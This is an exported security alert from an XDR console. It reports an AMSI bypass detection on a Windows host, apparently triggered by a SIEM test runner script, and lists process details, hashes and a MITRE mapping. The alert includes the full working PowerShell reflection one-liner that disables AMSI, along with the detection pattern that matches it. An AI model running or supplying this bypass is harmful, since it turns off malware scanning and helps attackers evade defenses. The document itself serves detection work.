MEDIUM AMSI Bypass

Detected ID: #3450 | Detected: 2026-01-03 05:39:53 | Lateral Movement
View Incident Back
Alert Overview

Process action type = execution AND target process cmd = *system.management.automation.amsiutils*amsiinitfailed*

Unclassified
XDR BIOC
New
DS:PANW/XDR Agent DOM:Security
Host Information
DESKTOP-FNUMV3U
172.30.1.80 172.26.224.1 172.30.192.1
DESKTOP-FNUMV3U\User
6761b82386d0481190f91c4255079cb7
-
Process Information Process Execution
Actor Process (Executor)
Process Name cmd.exe
Path C:\Windows\System32\cmd.exe
PID 27856
SHA256 badf4752413cb0cbdc03fb95820ca167f0cdc63b597ccdb5ef43111180e088b0 VT
MD5 2b40c98ed0f7a1d3b091a3e8353132dc
Signature Microsoft Corporation Signed 
C:\WINDOWS\system32\cmd.exe /c "powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)""
Action Process (Target)
Process Name powershell.exe
SHA256 9785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3 VT
Signature Microsoft Corporation Signed 
powershell  -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"
Parent Process (Causality)
Process Name cmd.exe
Path C:\Windows\System32\cmd.exe
SHA256 badf4752413cb0cbdc03fb95820ca167f0cdc63b597ccdb5ef43111180e088b0 VT
MD5 2b40c98ed0f7a1d3b091a3e8353132dc 
C:\WINDOWS\SYSTEM32\cmd.exe /c ""C:\app\cortex-xdr-siem-test\xdr_incident_runner.bat""
MITRE ATT&CK Mapping
TA0005 - Defense Evasion
T1562.001 - Impair Defenses: Disable or Modify Tools
Quick Actions
View Related Incident View Endpoint Check Hash on VirusTotal Back to Alerts
Severity Analysis
MEDIUM

Review and assess impact

Summary
Events 1
IP Addresses 3
Tags 2
File Artifacts Yes
Network Artifacts No
Registry Artifacts No
Analyst Verdict